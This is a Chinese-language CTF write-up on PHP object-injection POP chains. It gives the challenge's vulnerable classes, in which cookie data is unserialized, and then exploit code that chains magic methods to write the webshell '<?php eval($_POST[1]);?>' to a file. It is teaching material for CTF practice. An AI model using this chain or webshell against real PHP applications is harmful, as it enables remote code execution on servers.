php反序列化pop链一则
跟随wupco师傅学习
classes.php
<?php
class OutputFilter {
protected $matchPattern;
protected $replacement;
function __construct($pattern, $repl) {
$this->matchPattern = $pattern;
$this->replacement = $repl;
}
function filter($data) {
return preg_replace($this->matchPattern, $this->replacement, $data);
}
};
class LogFileFormat {
protected $filters;
protected $endl;
function __construct($filters, $endl) {
$this->filters = $filters;
$this->endl = $endl;
}
function format($txt) {
foreach ($this->filters as $filter) {
$txt = $filter->filter($txt);
}
$txt = str_replace('\n', $this->endl, $txt);
return $txt;
}
};
class LogWriter_File {
protected $filename;
protected $format;
function __construct($filename, $format) {
$this->filename = str_replace("..", "__", str_replace("/", "_", $filename));
$this->format = $format;
}
function writeLog($txt) {
$txt = $this->format->format($txt);
//TODO: Modify the address here, and delete this TODO.
file_put_contents("C:\\WWW\\test\\ctf\\kon\\" . $this->filename, $txt, FILE_APPEND);
}
};
class Logger {
protected $logwriter;
function __construct($writer) {
$this->logwriter = $writer;
}
function log($txt) {
$this->logwriter->writeLog($txt);
}
};
class Song {
protected $logger;
protected $name;
protected $group;
protected $url;
function __construct($name, $group, $url) {
$this->name = $name;
$this->group = $group;
$this->url = $url;
$fltr = new OutputFilter("/\[i\](.*)\[\/i\]/i", "<i>\\1</i>");
$this->logger = new Logger(new LogWriter_File("song_views", new LogFileFormat(array($fltr), "\n")));
}
function __toString() {
return "<a href='" . $this->url . "'><i>" . $this->name . "</i></a> by " . $this->group;
}
function log() {
$this->logger->log("Song " . $this->name . " by [i]" . $this->group . "[/i] viewed.\n");
}
function get_name() {
return $this->name;
}
}
class Lyrics {
protected $lyrics;
protected $song;
function __construct($lyrics, $song) {
$this->song = $song;
$this->lyrics = $lyrics;
}
function __toString() {
return "<p>" . $this->song->__toString() . "</p><p>" . str_replace("\n", "<br />", $this->lyrics) . "</p>\n";
}
function __destruct() {
$this->song->log();
}
function shortForm() {
return "<p><a href='song.php?name=" . urlencode($this->song->get_name()) . "'>" . $this->song->get_name() . "</a></p>";
}
function name_is($name) {
return $this->song->get_name() === $name;
}
};
class User {
static function addLyrics($lyrics) {
$oldlyrics = array();
if (isset($_COOKIE['lyrics'])) {
$oldlyrics = unserialize(base64_decode($_COOKIE['lyrics']));
}
foreach ($lyrics as $lyric) $oldlyrics []= $lyric;
setcookie('lyrics', base64_encode(serialize($oldlyrics)));
}
static function getLyrics() {
if (isset($_COOKIE['lyrics'])) {
return unserialize(base64_decode($_COOKIE['lyrics']));
}
else {
setcookie('lyrics', base64_encode(serialize(array(1, 2))));
return array(1, 2);
}
}
};
class Porter {
static function exportData($lyrics) {
return base64_encode(serialize($lyrics));
}
static function importData($lyrics) {
return serialize(base64_decode($lyrics));
}
};
class Conn {
protected $conn;
function __construct($dbuser, $dbpass, $db) {
$this->conn = mysqli_connect("localhost", $dbuser, $dbpass, $db);
}
function getLyrics($lyrics) {
$r = array();
foreach ($lyrics as $lyric) {
$s = intval($lyric);
$result = $this->conn->query("SELECT data FROM lyrics WHERE id=$s");
while (($row = $result->fetch_row()) != NULL) {
$r []= unserialize(base64_decode($row[0]));
}
}
return $r;
}
function addLyrics($lyrics) {
$ids = array();
foreach ($lyrics as $lyric) {
$this->conn->query("INSERT INTO lyrics (data) VALUES (\"" . base64_encode(serialize($lyric)) . "\")");
$res = $this->conn->query("SELECT MAX(id) FROM lyrics");
$id= $res->fetch_row(); $ids[]= intval($id[0]);
}
echo var_dump($ids);
return $ids;
}
function __destruct() {
$this->conn->close();
$this->conn = NULL;
}
};
触发点是一个直接可以反序列化。
题目不难,pop链构造一下,最后是可以生成一个shell
可以看看如何构造pop链:http://www.cnblogs.com/iamstudy/articles/php_object_injection_pop_chain.html
这里想记录的是构造pop链的一些过程,重新回顾一下。
unserialize — 从已存储的表示中创建 PHP 的值
类里面经常会用到两种函数:构造函数和析构函数
构造函数:具有构造函数的类会在每次创建新对象时先调用此方法,所以非常适合在使用对象之前做一些初始化工作。比如__construct
这里特别注意一下,创建新对象的时候才会调用,所以反序列化的时候是不会调用__construct
析构函数:在到某个对象的所有引用都被删除或者当对象被显式销毁时执行。比如__destruct
上面两种都是属于魔术方法,更多的魔术方法可以看:http://php.net/manual/zh/language.oop5.magic.php
所以找反序列化洞的时候一般可以重点关注两个魔术方法:__wakeup()(反序列化的初始化调用)、__destruct()
当然wakeup是可以绕过的,具体可以看看CVE-2016-7124
铺垫完了~下面解析一下这个pop如何构造
漏洞触发点1:可以写log进一个文件:LogWriter_File::writeLog()
$this->filename可控,注意不是$filename
虽然__construct里面写了,感觉是没法跨目录写shell,$this->filename = str_replace("..", "__", str_replace("/", "_", $filename));
但是反序列化的时候是不调用的,所以我们可以直接把这个注释掉,然后再在类里面添加一行$this->filename = '../1.php';
但是这里的文件内容为空,应该如何写入内容?
可以看到最上面的,OutputFilter::filter(),可以正则匹配空的,然后替换为shell内容,new OutputFilter("//i", "<i><?php eval(\$_POST[1]);?></i>");
漏洞触发点2:当然如何php如果版本不高于5.5的话,OutputFilter::filter(),可以用正则的/e模式来执行php代码
exp:
$fltr = new OutputFilter("//i", "<i><?php eval(\$_POST[1]);?></i>");
$fileformat_obj = new LogFileFormat();
$format = new LogFileFormat(array($fltr), "\n");
$filename = '1.php';
$logwrite_obj = new LogWriter_File($filename, $format);
$writer = $logwrite_obj;
$logger_obj = new Logger($writer);
$lyrics = 1;
$song = $logger_obj;
$lyrics_obj = new Lyrics($lyrics, $song);
echo base64_encode(serialize($lyrics_obj));
这里还有要说的坑点就是private变量,它最后周围是有不可见字符\x00,所以如果不是base64编码的话,可以用%00来代替。
